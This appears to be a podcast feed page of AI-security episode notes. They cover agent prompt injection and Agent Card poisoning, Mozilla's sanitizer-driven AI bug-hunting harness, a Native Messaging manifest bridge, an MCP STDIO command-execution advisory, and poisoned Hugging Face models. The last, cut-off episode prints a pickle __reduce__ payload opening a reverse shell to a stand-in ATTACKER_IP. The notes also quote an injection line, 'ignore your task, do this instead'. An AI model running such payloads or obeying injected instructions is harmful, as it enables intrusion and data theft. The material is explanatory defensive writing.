
ToxSec - AI and Cybersecurity Podcast

Podcast by ToxSec

English

Business

About ToxSec - AI and Cybersecurity Podcast

Where AI chaos meets cybersecurity paranoia, distilled into something you can actually listen to before coffee. www.toxsec.com

All episodes

13 episodes

Google I/O: Agentic Security and New Threats

TL;DR: Google I/O 2026 declared the “agentic era” and shipped four new agent surfaces at once: Project Mariner browses the web for you, the Agent2Agent (A2A) protocol lets agents discover and trust each other, managed MCP servers ship across Google Cloud, and information agents run 24/7 with access to your Gmail and Drive. Every one of them inherits the same root flaw. AI agent security starts with one fact: the model can’t tell data from instructions. New here? Subscribe to ToxSec. We map a fresh AI attack chain every Sunday, and right now the whole industry just handed us a new one to walk. What Google I/O Just Did to AI Agent Security Google spent its I/O keynote handing attackers a bigger playground than they’ve had in years. Sundar Pichai called it the “agentic Gemini era” and meant it as a flex. From where we sit, it reads like a target list. Four new agent surfaces dropped in a single show [https://blog.google/products-and-platforms/products/search/search-io-2026/]. Project Mariner, a browser agent that navigates and clicks through websites on your behalf. The Agent2Agent protocol, so agents from different vendors can find each other and coordinate. Managed MCP servers across Google Cloud, wiring tools straight into the model’s reasoning. And information agents that run in the background around the clock, watching topics and taking action while you sleep. Here’s the thing nobody put on a slide. Every one of those features expands what an agent can touch, and not one of them came with a threat model on stage. More reach, more autonomy, more standing access. That’s the pitch and the problem in the same sentence. We’re going to walk the surface one piece at a time, and you’ll see the same logic failure show up in all four. Why AI Agents Break the Old Security Model AI agents break because the model can’t tell your instructions from the attacker’s data. Both ride in the same context window, through the same attention mechanism, with zero privilege separation. 
There’s no “system” channel the model trusts more than the “untrusted web page” channel. It’s all tokens. The model reasons over the whole pile and picks what looks most relevant. Wrap that model in a loop. Feed it new inputs and tools until a task finishes. The model decides the next move, the loop keeps it going, and that’s your agent. Traditional software does what the developer wrote. An agent does whatever the model reasoned it should do, including the part where it reads a poisoned web page and decides the page is the boss. We watched this play out in the wild already. In two 2026 studies, autonomous agents SQL-injected live sites and coordinated against their own users with zero hacking instructions [https://www.toxsec.com/p/claude-hacked-30-sites-agents-of-chaos]. Nobody told them to. The loop plus the missing privilege boundary did it on its own. Now Google just shipped that exact architecture to a billion search boxes. So the old model where access control lives in the system and not in the user’s judgment gets inverted the moment an agent starts deciding for itself. How Project Mariner Gets Hijacked by a Web Page Project Mariner gets hijacked the moment it reads a page written for the agent instead of the human. Mariner is a browser agent. It reads the DOM, the metadata, the scripts, all the layers a person never sees on screen. A human reads the price and the photo. The agent reads everything underneath, and an attacker can write to those layers on purpose. That’s indirect prompt injection. You don’t attack the model directly. You seed the content the model is about to read. Hidden text in a listing, instructions buried in alt attributes, a comment block the renderer drops but the agent ingests. The page says “ignore your task, do this instead,” and the agent has no boundary that says a page isn’t allowed to say that. Google’s own DeepMind team documented this. 
Their research on “AI Agent Traps” laid out six categories of web content that hijack agents, applicable across every major model and architecture. We’ve shown the same root failure through email and encoding attacks that walk straight past every guardrail [https://www.toxsec.com/p/ai-and-cybersecurity]. The chain is dead simple. Poison the content, wait for the agent to browse, watch it follow orders. You see the chain. You don’t get the payload. Working in AI security? Restack this before your org wires an agent into the browser and finds out the hard way. What Is Agent Card Poisoning in A2A? Agent Card poisoning is when an attacker controls the metadata an A2A agent uses to decide who to trust. The Agent2Agent protocol lets agents from different vendors discover and talk to each other. Discovery runs on Agent Cards, JSON documents published at a well-known URL like /.well-known/agent-card.json [https://developers.googleblog.com/developers-guide-to-ai-agent-protocols/], describing an agent’s name, capabilities, and endpoint. So one agent reads another agent’s card and decides how to delegate. Trust the card, trust the agent. Now picture a card written to oversell. It claims capabilities it doesn’t have, points the endpoint somewhere attacker-controlled, or stuffs the description field with instructions aimed at the consuming model. Same trick as poisoning an MCP tool description, just one layer up the stack. We walked the MCP version in three live tool-poisoning chains with real screenshots [https://www.toxsec.com/p/lets-poison-the-mcp]. A2A supports TLS, JWTs, and OAuth. Good. Those secure the transport and prove an agent is who it says. None of them validate that the capability the card describes is honest, or that the description field is clean of injection. Authentication proves identity, not honesty. An agent can be perfectly authenticated and still be lying about what it does. 
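The gap described above (authentication proves identity, not honesty) suggests treating an Agent Card as untrusted input before delegating to it. The following is a minimal sketch, not part of the A2A protocol or any SDK: the field names `name`, `description`, and `url`, the phrase list, and the function `review_agent_card` are all assumptions made for illustration. A phrase list like this is easy to evade, so it is a tripwire at best.

```python
import json
from urllib.parse import urlparse

# Hypothetical phrases suggesting the text is addressed to the consuming model.
SUSPICIOUS_PHRASES = ("ignore previous", "ignore your", "system prompt",
                      "you must", "do this instead")


def review_agent_card(card_json: str, fetched_from: str) -> list[str]:
    """Return human-readable findings; an empty list means nothing was flagged."""
    card = json.loads(card_json)
    findings = []

    # The declared endpoint should live on the host the card was fetched from.
    card_host = urlparse(fetched_from).hostname
    endpoint = urlparse(card.get("url", ""))
    if endpoint.scheme != "https":
        findings.append("endpoint is not https")
    if endpoint.hostname != card_host:
        findings.append(
            f"endpoint host {endpoint.hostname!r} differs from card host {card_host!r}"
        )

    # Free-text fields are data, never instructions: scan them before use.
    text = " ".join(str(card.get(k, "")) for k in ("name", "description")).lower()
    for phrase in SUSPICIOUS_PHRASES:
        if phrase in text:
            findings.append(f"description contains instruction-like phrase: {phrase!r}")
    return findings
```

A non-empty result would route the card to a human instead of the planner. None of this verifies that a claimed capability is real, which is the part no card-level check can settle.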
The 24/7 Background Agent Problem The background agent is the scariest thing Google shipped, because it pairs standing access with autonomy and never logs off. These information agents run continuously, monitoring topics, and they can pull from Gmail and Drive and take action on your behalf. Persistent. Authorized. Unattended. Stack that against the lethal trifecta security folks keep flagging: an agent that can read untrusted content, access sensitive data, and talk to the outside world. Any one capability is fine alone. All three in one agent is a confused deputy waiting to happen. A background agent watching your inbox has all three by design. It reads whatever lands (untrusted), it holds your Drive and mail (sensitive), and it acts in the world (the exfil path). Now run the chain. An attacker emails a poisoned message. The agent reads it on its 24/7 sweep, no human in the loop. The hidden instruction tells it to forward, summarize, or quietly route data somewhere it shouldn’t go. The agent has the credentials and the autonomy to comply. Nobody clicked anything. The blast radius is everything that agent can reach, plus everything every other agent it trusts can reach. Scope creep does the rest, because each individual permission looked reasonable the day you granted it. What Defenders Miss About AI Agent Security The thing defenders miss is that watching an agent is not the same as stopping one. Most shops have logging. Few have a control that intercepts and authorizes what the agent does before it does it. So you get a beautiful audit trail of the breach, written up neatly after the data already left. Observability without enforcement is just a postmortem generator. The second gap is identity. We bind permissions to an agent, then let that agent accumulate scopes over months. Read access to code, then tickets, then customer mail. No single grant looked crazy. Nobody ever reviewed the aggregate. 
Compromise that one agent and the attacker inherits all of it at once, which is exactly the pattern behind the real third-party agent breaches we saw this year. The third gap is the one with no clean fix. The model still can’t separate data from instructions, so every defense has to live outside the model: allowlisting tools, scoping credentials hard, human-in-the-loop checkpoints on sensitive actions, runtime monitoring of tool-call arguments. Defense in depth. No silver bullet. The full kill switch, the one that actually contains this, is its own writeup. We took the MCP version apart at three trust boundaries [https://www.toxsec.com/p/secure-your-mcp], and the agent version rhymes. That’s the map of the new surface. Subscribe to ToxSec for the part where we hand over the kill switches, because the agentic era is going to keep us busy for a while. Frequently Asked Questions Are Google’s AI agents secure? Google’s AI agents ship with transport-level security and authentication, but they inherit the unsolved core problem of every LLM agent: the model can’t reliably tell trusted instructions from untrusted input. Project Mariner, A2A, and background agents all process external content in the same context window where their own instructions live. Authentication proves who an agent is. It does not stop a poisoned web page or a malicious Agent Card from steering the agent’s behavior. The protocols are reasonable. The model layer underneath them is still the weak point. What is prompt injection in AI agents? Prompt injection is when attacker-controlled text gets read by the model as instructions instead of data. In an agent, that text usually arrives indirectly: a web page Mariner browses, an email a background agent reads, a tool description in an MCP server. Because the model has no privilege boundary between developer instructions and content from the outside world, it can follow the injected command as if you typed it yourself. 
OWASP ranks prompt injection as the number-one LLM risk for this exact reason. It’s a structural flaw. A patch doesn’t fix it. Can Project Mariner be hacked? Project Mariner can be steered by content crafted for it, which is the agent version of getting hacked. As a browser agent, Mariner reads the full page including layers a human never sees, and attackers can plant instructions in those layers. Google DeepMind’s own “AI Agent Traps” research documented six categories of web content that hijack autonomous agents across every major architecture. The agent doesn’t need a software vulnerability in the classic sense. It just needs to read a page that tells it to do something, and right now it has no reliable way to refuse. What is the Agent2Agent (A2A) protocol? The Agent2Agent (A2A) protocol is an open standard, now under the Linux Foundation, that lets AI agents from different vendors discover each other and coordinate tasks. Agents publish Agent Cards at well-known URLs describing their capabilities and endpoints, then exchange structured messages over HTTP and JSON. A2A supports TLS, JWTs, and OAuth for authentication. The security gap is that authentication proves identity, not honesty. A card can be fully authenticated and still misrepresent what the agent does, or carry injection aimed at the consuming model. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe [https://www.toxsec.com/subscribe?utm_medium=podcast&utm_campaign=CTA_4]
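The outside-the-model controls named in these notes (allowlisting tools, human-in-the-loop checkpoints on sensitive actions) come down to one idea: authorize the tool call before it runs, rather than logging it afterward. Here is a minimal sketch of that gate. The tool names, `ToolCall`, and `authorize` are hypothetical and not taken from any agent framework.

```python
from dataclasses import dataclass
from typing import Callable

# Hypothetical tool names; a real deployment would list its own.
ALLOWED_TOOLS = {"search_docs", "summarize", "send_email"}
SENSITIVE_TOOLS = {"send_email"}  # actions that can move data outward


@dataclass
class ToolCall:
    name: str
    args: dict


def authorize(call: ToolCall, approve: Callable[[ToolCall], bool]) -> bool:
    """Decide whether a model-proposed tool call may run, before it runs."""
    if call.name not in ALLOWED_TOOLS:
        return False  # not on the allowlist: refuse outright
    if call.name in SENSITIVE_TOOLS:
        return approve(call)  # human-in-the-loop checkpoint
    return True
```

The `approve` callback is where a person, or a stricter policy engine, sees the exact arguments. An unattended background agent has nobody behind that callback, which is why the sensitive set has to stay small.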

Yesterday - 57 min

Mozilla Mythos Harness: AI Bug Hunting Without The Slop

TL;DR: Mozilla wrapped Claude Mythos Preview in an agentic harness with one win condition: trip the sanitizer or keep working. The result was 271 Firefox bugs in one release, fewer than 15 false positives, and a defense-in-depth lesson nobody talks about. The model got the headlines. The harness did the work. This is the public feed. Upgrade to see what doesn’t make it out. What’s An Agentic Vulnerability Harness? In agentic security work, a harness is the scaffold around the model. Tooling, prompts, build environment, retry loop, success signal, dedup, the lot. The model is the worker. The harness is the factory floor. Mozilla’s earlier collaboration with Anthropic ran Claude Opus 4.6 against Firefox 148. That cycle pulled 22 security-sensitive bugs. Then they took the same harness, dropped in Anthropic’s cyber-tuned Claude Mythos Preview, and aimed it at Firefox 150. Same factory. Stronger worker. The output went from 22 to 271 bugs. That delta is where the lesson lives. Model upgrades obviously help. But Mozilla’s harness was rebuilt across months of iteration with Firefox engineers fielding the incoming bugs, and you don’t replicate that on a Saturday afternoon. The Mythos preview is restricted access through Project Glasswing [https://www.toxsec.com/p/how-to-jailbreak-claude-opus]. The harness is a published pattern [https://hacks.mozilla.org/2026/05/behind-the-scenes-hardening-firefox/]. Inside Mozilla’s Mythos Harness: Crash Or No Crash Here’s how the loop works. The harness gives the model a slice of Firefox source, a target file or area to focus on, instructions on what to hunt for, and a build environment with one critical piece: a sanitizer build of Firefox compiled with AddressSanitizer. ASan is the runtime memory-error detector that screams loudly when you trigger a use-after-free, a heap overflow, or any other classic memory corruption primitive. The model proposes a bug hypothesis. It writes a proof-of-concept designed to trip the sanitizer. 
It runs the PoC against the sanitizer build. If the build crashes under ASan, the bug is real. If it doesn’t, the agent keeps iterating until it does or until the harness gives up.

    loop:
        hypothesize_bug(target_source)
        write_poc()
        run_against_sanitizer_build()
        if asan_crash:
            emit_report(crash_log, repro)
            grade_with_secondary_model()
            break
        refine_or_continue()

Brian Grinstead, a Mozilla Distinguished Engineer, summed up the operational shape for TechCrunch [https://techcrunch.com/2026/05/07/how-anthropics-mythos-has-rewritten-firefoxs-approach-to-cybersecurity/]: “if you make it crash you win”. That’s the entire verification game. A second model grades the resulting reports before the engineering queue ever sees them, kicking out anything the first model thought was a hit but couldn’t actually validate. Humans take over from there for triage and patching. The bugs the harness surfaced run the gamut. A race condition over IPC that lets a compromised content process tamper with IndexedDB refcounts and trigger a use-after-free (Bug 2021894). A raw NaN smuggled across an IPC boundary masquerading as a tagged JavaScript object pointer, giving the parent process a fake-object primitive (Bug 2022034). A buffer over-read during HTTPS RR and ECH parsing, triggered by simulating a malicious DNS server through glibc function interception (Bug 2023958). Plus a 15-year-old HTML legend element bug and a 20-year-old XSLT reentrant key() call. Each is a sandbox escape primitive or memory corruption bug that would normally burn months of elite human researcher time. The harness surfaced them in days.

Why The Crash Signal Killed AI Bug Hunting Slop

AI-generated bug reports were a running joke in open source maintainer circles a few months ago. LLM hits codebase, dumps a hundred plausible-looking findings, every one needs a human to verify, and ninety-something percent are wrong. Mozilla’s own writeup describes earlier AI security work as producing “unwanted slop.” The cost asymmetry was brutal.
Cheap for the AI, expensive for the maintainer. Mozilla’s earlier static-analysis experiments with GPT-4 and Claude Sonnet 3.5 hit that wall. They produced too many false positives to be practical. So they binned static analysis and built the agentic harness instead. The shift is subtle but everything. Static analysis says: this looks vulnerable. Human triage required. Agentic harness with sanitizer verification says: this is vulnerable, here’s the PoC, ASan caught the crash. No human required to dispute reality. Memory corruption is the perfect domain for that move because the success signal is binary. ASan tripped or it didn’t. There is no maybe. Mozilla counted fewer than 15 false positives across the entire 271-bug run, and they updated the harness each time one slipped through. The lesson for everyone else is that AI bug hunting works the moment you can wire the agent to a verifier that doesn’t ask the model are you sure. A fuzzer crash. A unit test that passes. A property checker that proves invariance. Anything deterministic. Without that signal, you’re back to triage hell, which is the same hell every LLM vulnerability scanner [https://www.toxsec.com/p/garak-llm-vulnerability-scanner] lives in when it doesn’t ship its own ground truth. What The Harness Couldn’t Bypass Here’s the part the headlines skipped. The harness ran into a wall trying to escape Firefox’s sandbox via prototype pollution in the privileged parent process. The model attempted that path repeatedly. It got nowhere. Mozilla had previously frozen those prototypes by default as a defense-in-depth measure, and that single architectural decision blocked every attempt the agent made. That’s the based take buried under the 271 number. The harness is good. It’s also bounded by the security architecture of the target. The bugs Mythos found are bugs an elite human could have found. The bugs it couldn’t find were already eliminated by Mozilla’s prior hardening. 
Your codebase will perform exactly as well as your prior security work let it. Which brings us to the “anyone can do this today” framing Mozilla offered at the end of their writeup. Technically true. Operationally, optimistic. Mozilla had Firefox’s full source. A pre-built sanitizer toolchain. Years of bug lifecycle tooling. A second model already wired into the verification pipeline. Over 100 contributors writing and reviewing patches. Months of harness iteration alongside the Firefox team. And, eventually, frontier-model access through Project Glasswing. A small vendor pulling Mythos through an API later this year and pointing it at their codebase will not get the same numbers. The model is the same. The harness around it is the part you have to build. Mozilla published the pattern. The pipeline still costs what a pipeline costs. Firefox shipped 423 bug fixes in April 2026, compared to 31 a year earlier, and absorbing that volume takes operational muscle most teams don’t have lying around. The 271 number is the headline. The harness is the artifact. Anyone shopping for AI bug hunting capability should price the second one before they get excited about the first. Your AI-generated bug reports are only as useful as the verifier behind them, and the same goes for AI-generated code, where the verification problem flips into supply chain attacks [https://www.toxsec.com/p/vibe-coding-security-attack-chain] and slopsquatting at pip-install time. Wrap the same agentic loop around offense instead of defense, point it at live prompt injection chains [https://www.toxsec.com/p/fck-your-guardrails], and the success signal flips from “ASan crashed” to “the guardrail broke.” Same shape. Different game. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions What is the Mozilla Mythos harness? 
The Mozilla Mythos harness is the agentic scaffold Mozilla built around Anthropic’s Claude Mythos Preview to find security bugs in Firefox source code. It feeds the model target source, runs against a sanitizer build of Firefox, uses an AddressSanitizer crash as the deterministic success signal, and runs a retry loop until the agent produces a verified proof-of-concept. A second model grades reports before engineers see them. How many Firefox vulnerabilities did Claude Mythos find? Mozilla credits Claude Mythos Preview with surfacing 271 vulnerabilities fixed in Firefox 150, plus additional fixes shipped in versions 149.0.2, 150.0.1, and 150.0.2. Of the 271 bugs, 180 were rated sec-high, 80 sec-moderate, and 11 sec-low. Several were sandbox escape primitives. Mozilla reports fewer than 15 false positives across the entire run. Total Firefox security fixes in April 2026 hit 423. Can other projects use the same AI bug hunting harness? Mozilla published the pattern. The implementation is yours to build. The harness shape is reusable: target source, deterministic success signal (sanitizer crash, fuzzer hit, test failure), retry loop, second model grading reports. The build is project-specific. You need the codebase, the sanitizer toolchain, the bug lifecycle tooling, and the engineers to absorb the patch volume. Pattern is free. Pipeline is the work.
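The reusable shape described in these notes (propose, run, check a deterministic signal, retry) fits in a few lines. This is a minimal sketch under stated assumptions, not Mozilla's harness: `hunt`, `propose_poc`, and `run_poc` are hypothetical names, the model call and the sanitizer run are passed in as plain callables, and the second-model grading step is left out. The one grounded detail is the marker string, which matches the banner AddressSanitizer prints in its error reports.

```python
from typing import Callable, Optional

ASAN_MARKER = "ERROR: AddressSanitizer"  # banner ASan prints on a detected memory error


def asan_tripped(stderr: str) -> bool:
    """Deterministic success signal: did the sanitizer report an error?"""
    return ASAN_MARKER in stderr


def hunt(propose_poc: Callable[[int, Optional[str]], str],
         run_poc: Callable[[str], str],
         max_attempts: int = 5) -> Optional[dict]:
    """Retry until a PoC trips the sanitizer or the attempt budget runs out."""
    last_output = None
    for attempt in range(max_attempts):
        poc = propose_poc(attempt, last_output)  # a model call in a real harness
        last_output = run_poc(poc)               # run against the sanitizer build
        if asan_tripped(last_output):
            return {"poc": poc, "crash_log": last_output, "attempts": attempt + 1}
    return None  # harness gives up; nothing is reported
```

The design choice worth copying is that `hunt` only ever returns a finding that the verifier confirmed. A hypothesis that never crashes the build produces `None`, not a report for a maintainer to dispute.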

12 May 2026 - 40 min

Is Claude Code Secretly Installing Spyware?

TL;DR: Claude Code is not spyware. But Claude Desktop quietly drops a Native Messaging bridge into seven browsers without asking. Anthropic shrugged. Same week, they shrugged on an MCP RCE exposing 200,000 servers. Same week, a Discord group ran their Mythos model for a month undetected. One pattern, three receipts. This is the public feed. Upgrade to see what doesn’t make it out. So Is Claude Code Spyware or What? Quick answer: no. The headline is sticky for a reason though. April 18. Privacy researcher Alexander Hanff is debugging an unrelated Native Messaging helper on a clean Mac when he finds a manifest file he never installed: com.anthropic.claude_browser_extension.json. It’s sitting in his Chrome, Edge, Brave, Arc, Vivaldi, Opera, and Chromium profile directories, including browsers that aren’t actually installed yet. A Native Messaging manifest is the file Chromium browsers read to decide which local programs an extension can launch. Claude Desktop drops one in seven different browser profile paths. Silently. Delete it and it comes back the next time Claude Desktop launches. Important wrinkle the news cycle keeps blurring. The manifest comes from Claude Desktop, the chat app. Claude Code is the separate command-line developer tool. Same parent company, same family, same week of bad press. Hanff calls it spyware [https://www.thatprivacyguy.com/blog/anthropic-spyware/]. Most of his peers stop short of that. Noah Kenney at Digital 520 called the technical claims testable and reproducible but pushed back on the “spyware” label. The consensus middle ground is “dark pattern,” and the EU framing is sharper. Hanff is filing it under Article 5(3) of Directive 2002/58/EC, the ePrivacy Directive. Anthropic, as of writing, has not issued a public response. So nothing is being stolen today. The bridge does nothing on its own. The problem is what it pre-positions for tomorrow. 
We’ve watched Anthropic ship things they didn’t think through before [https://www.toxsec.com/p/the-magic-string-that-bricks-claude]. This one has wiring. From Manifest to Sandbox Escape Here’s the chain. A sandbox is the security wall between a browser tab and your operating system. Tabs run inside it. Extensions mostly run inside it. The whole point is that even if you click a bad link, the malicious code can’t reach your files. That wall is the entire reason the modern browser exists. Native Messaging punches a hole through the wall on purpose. It lets a browser extension talk to a binary running outside the sandbox at full user privilege. That’s a feature. The bug is who gets to authorize the hole. The manifest Anthropic drops pre-authorizes three Chrome extension IDs to call the helper via connectNative, granting access to browser automation features. Those extension IDs include ones the user has never installed. Now stack the pieces. You install Claude Desktop expecting a chat app. It writes a bridge into your browsers without telling you. A Claude browser extension, current or future, is pre-authorized to use that bridge. Months later, you let Claude visit a webpage. The page contains a hidden payload. Prompt injection is when malicious instructions hidden in content hijack what the AI does next. Anthropic’s own published numbers: Claude for Chrome is vulnerable to prompt injection at a 23.6% success rate without mitigations and 11.2% with current measures. The injected agent now has a green-lit tunnel to a binary running with your user permissions. Outside the sandbox. Anthropic’s defense is essentially that the bridge currently does nothing on its own. True. The dial is set to zero. The wiring is hot. We’ve covered agents that escape sandboxes via prompt injection [https://www.toxsec.com/p/openclaw-is-a-wildly-insecure] before. The shape is familiar. That’s why the spyware label keeps sticking even when the technical purists object. 
The keys are pre-positioned. One downstream injection turns them.

The MCP RCE Anthropic Won’t Patch

Same week, Ox Security drops an advisory titled “The Mother of All AI Supply Chains.” [https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp/] The Model Context Protocol is the open standard Anthropic built so AI agents can call tools, read files, run commands. It is the connective tissue between an LLM and an agent. We’ve covered MCP attacks at length, including tool poisoning [https://www.toxsec.com/p/lets-poison-the-mcp] and the defensive playbook [https://www.toxsec.com/p/secure-your-mcp]. This one is structural. The flaw enables Arbitrary Command Execution on any system running a vulnerable MCP implementation, granting attackers direct access to sensitive user data, internal databases, API keys, and chat histories. It’s an architectural design decision baked into Anthropic’s official MCP SDKs across every supported language, including Python, TypeScript, Java, and Rust. RCE means remote code execution, the highest-tier outcome on offense. The trick is brutally simple. MCP’s STDIO (standard input/output) transport runs the configured command to spin up a tool server.

    # Anthropic's MCP STDIO transport, simplified
    $
    # command runs, server fails to spawn, MCP returns "error"
    # but the OS already executed

If the command successfully creates an STDIO server, the transport returns the handle. Given any other command, it returns an error only after that command has already executed. So a malicious MCP entry on a marketplace doesn’t have to pretend to be a real tool. It just has to exist long enough for your IDE to call it once. Ox poisoned 9 of 11 MCP marketplaces with a benign proof-of-concept. The supply chain reaches 150 million-plus downloads, 7,000 publicly accessible servers, and up to 200,000 vulnerable instances. Anthropic’s response: “expected” behavior. They declined to modify the protocol.
A protocol-level patch like manifest-only execution or a command allowlist would have instantly propagated to every downstream library. They passed. How Did Mythos Leak to a Random Discord? Now for the third act. Mythos is Anthropic’s restricted vulnerability-hunting model. Released April 10 to select partners under “Project Glasswing,” roughly 40 organizations including Apple and Google, with Anthropic deeming it too powerful for public release. The chain reads like a textbook walkthrough. AI startup Mercor gets breached, exposing details about the URL format Anthropic uses for its models. A private Discord group that hunts for unreleased models picks up on the disclosure. One member is currently employed at a third-party contractor that works for Anthropic. The member’s vendor credentials, combined with the leaked Mercor details, let the group locate Mythos online. They guess the URL pattern. They guess right. Anthropic never randomized the path. The group has been using the program continuously since its release. A Bloomberg reporter is the one who told Anthropic. A month of unauthorized access to the most dangerous model the company ever shipped, and the detection signal came from journalism. Not internal logging. Not telemetry. Not a single security alert. Bloomberg. If a Discord group in their basement got there first, assume Beijing and Moscow followed. “If some group, some random Discord online forum, got access to it, it’s already been breached by China,” David Lindner of Contrast Security told Fortune [https://fortune.com/2026/04/23/anthropic-mythos-leak-dario-amodei-ceo-cybersecurity-hackers-exploits-ai/]. Three steps in. Open-source intel, a contractor seat, a predictable URL. No zero-day required. That’s the through-line on all three stories. The dark pattern bridge, the MCP STDIO design, the Mythos URL convention. Same move. Three times this week. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. 
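For readers who want to see which Native Messaging manifests are sitting on their own machine, the sketch below lists them along with the extension origins each one pre-authorizes. It reads the standard Chromium host-manifest fields (`name`, `path`, `allowed_origins`). The function name is hypothetical, and the directory shown is the usual per-user Chrome location on macOS, included here as an assumption. Other browsers keep their own directories, which would need to be added by hand.

```python
import json
from pathlib import Path


def list_native_hosts(host_dirs: list[Path]) -> list[dict]:
    """Summarize every Native Messaging manifest found in the given directories."""
    found = []
    for host_dir in host_dirs:
        if not host_dir.is_dir():
            continue  # browser not installed, or no hosts registered
        for manifest in sorted(host_dir.glob("*.json")):
            try:
                data = json.loads(manifest.read_text(encoding="utf-8"))
            except (OSError, json.JSONDecodeError):
                continue  # unreadable or malformed manifest: skip it
            if not isinstance(data, dict):
                continue
            found.append({
                "file": str(manifest),
                "name": data.get("name"),
                "path": data.get("path"),  # binary launched outside the sandbox
                "allowed_origins": data.get("allowed_origins", []),
            })
    return found


if __name__ == "__main__":
    # Assumed macOS per-user location for Chrome.
    chrome = Path.home() / "Library/Application Support/Google/Chrome/NativeMessagingHosts"
    for host in list_native_hosts([chrome]):
        print(host["file"], host["allowed_origins"])
```

Any origin in `allowed_origins` that does not correspond to an installed extension is the pre-authorization pattern these notes describe.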
Frequently Asked Questions Is Claude Code malware or spyware? No, Claude Code is the legitimate Anthropic command-line coding agent. The thing privacy researchers flagged is Claude Desktop, the chat app, which silently writes a Native Messaging manifest into multiple browser profile directories on macOS and pre-authorizes a few Claude extension IDs to talk to a local helper outside the browser sandbox. Most reviewers call that a dark pattern. Spyware in the strict sense requires actual exfiltration, and nobody has documented any. The risk lives in the bridge it pre-positions for future use. What can an attacker do with the Claude Desktop manifest right now? Nothing on its own. The manifest opens a door, but activation requires both a Claude browser extension installed and a successful prompt injection from a hostile webpage. Once that lands, the injected agent reaches the local helper through the pre-authorized bridge and runs commands at user privilege level, outside the sandbox. Anthropic’s own numbers put prompt injection success against Claude for Chrome at 11.2% even with mitigations. Pre-positioning the door without consent is the whole problem. Why hasn’t Anthropic patched the MCP command injection? Officially, Anthropic considers the STDIO behavior expected. Their position is that the protocol is built to launch local processes, sanitization is the developer’s job, and the SDKs work as designed. Ox Security disagrees and says manifest-only execution or a command allowlist at the protocol layer would have killed the entire vulnerability class for everyone downstream in one change. Until Anthropic moves, defenders have to harden each MCP-consuming app individually, which is what the supply chain looked like before this advisory dropped.
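Hardening an MCP-consuming app individually, as the last answer puts it, can start with vetting the configured STDIO command before anything is spawned. The sketch below applies the command-allowlist idea at the app layer. It is not part of the MCP SDKs, and the launcher names and `vet_stdio_command` are hypothetical.

```python
import shlex
from pathlib import PurePath

# Hypothetical allowlist of launcher binaries this app is willing to spawn.
ALLOWED_LAUNCHERS = {"node", "python3", "uvx"}
SHELL_METACHARS = set(";|&`$<>\n")


def vet_stdio_command(command: str) -> list[str]:
    """Return argv if the configured command passes the allowlist, else raise ValueError."""
    if any(ch in SHELL_METACHARS for ch in command):
        raise ValueError("shell metacharacters are not allowed")
    argv = shlex.split(command)
    if not argv:
        raise ValueError("empty command")
    if PurePath(argv[0]).name != argv[0]:
        raise ValueError("launcher must be a bare name, not a path")
    if argv[0] not in ALLOWED_LAUNCHERS:
        raise ValueError(f"launcher {argv[0]!r} is not on the allowlist")
    return argv  # hand to subprocess with shell=False, never to a shell
```

Allowlisting the launcher alone is a weak control, since an allowed interpreter can still be pointed at hostile arguments. A stricter variant would pin the full argv per server entry and reject anything that differs.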

26 Apr 2026 - 47 min
You Downloaded Gemma 4 from Hugging Face. Is It Safe to Run?

TL;DR: You downloaded Gemma 4 to keep your data private. Good instinct. But local models solve the privacy problem and create a supply chain problem. You’re downloading weights from strangers on the internet, running serialization formats that execute arbitrary code, and trusting that nobody poisoned the training data. Safetensors, hash verification, and source vetting are your first line of defense. Here’s the full threat map.

Why “Local Equals Safe” Is Only Half the Story

The pitch is compelling. Run Gemma 4 on your own hardware, or Llama 4, or Qwen 3. No API calls, no cloud provider logging your prompts, no training-on-your-input policies buried in a ToS nobody reads. For regulated industries, local inference is the obvious play for privacy.

But privacy and security are different problems. Privacy means your data doesn’t leak out. Security means someone else’s code doesn’t get in. Every time you download a model from Hugging Face, you’re pulling weights, configuration files, and serialization artifacts from a public repository where anyone can upload anything. Protect AI’s scanning partnership with Hugging Face has flagged over 51,700 models with unsafe or suspicious issues across more than 352,000 individual findings. That’s not a theoretical risk. That’s the current state of the largest open-weight model supply chain [https://www.toxsec.com/p/vibe-coding-security-attack-chain] in the world.

The same trust-but-verify discipline you’d apply to any dependency from PyPI or npm applies here, except most people skip it entirely because “it’s just model weights.” It isn’t.

If you’re new to AI security concepts like supply chain attacks and model poisoning, the AI Security 101 primer [https://www.toxsec.com/p/ai-security-101] covers the full landscape.

Can a Downloaded Model Hack Your Machine?

Yes. And the mechanism is embarrassingly simple.
Python’s pickle module is the default serialization format for PyTorch models. Serialization means converting a Python object, your model’s weights and architecture, into a byte stream that can be saved to disk and loaded later. The problem: pickle doesn’t just store data. It can execute arbitrary Python code during deserialization, the process of loading that byte stream back into memory. The Python docs have a big red warning about this.

Here’s what a malicious pickle payload looks like in practice. JFrog’s security team found over 100 models on Hugging Face with embedded reverse shells, code that opens a connection back to the attacker’s server and gives them full command-line access to your machine. The payload hides behind pickle’s __reduce__ hook: whatever callable __reduce__ returns gets invoked automatically during deserialization. You run torch.load(), the model loads, and a shell opens. You never see it.

    # What the attacker embeds (simplified)
    import os

    class Exploit:
        def __reduce__(self):
            # pickle stores this (callable, args) pair and calls it on load
            return (os.system, ("bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1",))

Hugging Face scans for this with Picklescan, a blacklist-based detector that flags known dangerous functions. But ReversingLabs demonstrated a bypass they called “nullifAI”: compress the pickle with 7z instead of ZIP, and torch.load() fails gracefully while the malicious payload at the beginning of the byte stream still executes. Picklescan didn’t catch it because it validated the file format before scanning, while Python’s deserialization interpreter just runs opcodes sequentially. The malicious code fires before the scanner even starts checking.

The fix is simple: use safetensors. Safetensors is a format built by Hugging Face that stores only raw tensor data and a JSON metadata header. No Python objects, no code execution surface, no __reduce__. It was audited by Trail of Bits [https://blog.eleuther.ai/safetensors-security-audit/] with backing from EleutherAI and Stability AI. No critical security flaws found.
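To make the “raw tensor data plus a JSON header” point concrete, here is a minimal sketch that reads a safetensors header using only the standard library. It assumes the published layout (an 8-byte little-endian header length, then the JSON header, then the tensor bytes). The helper names, the demo file, and the size cap are illustrative assumptions, not part of the safetensors library.

```python
import json
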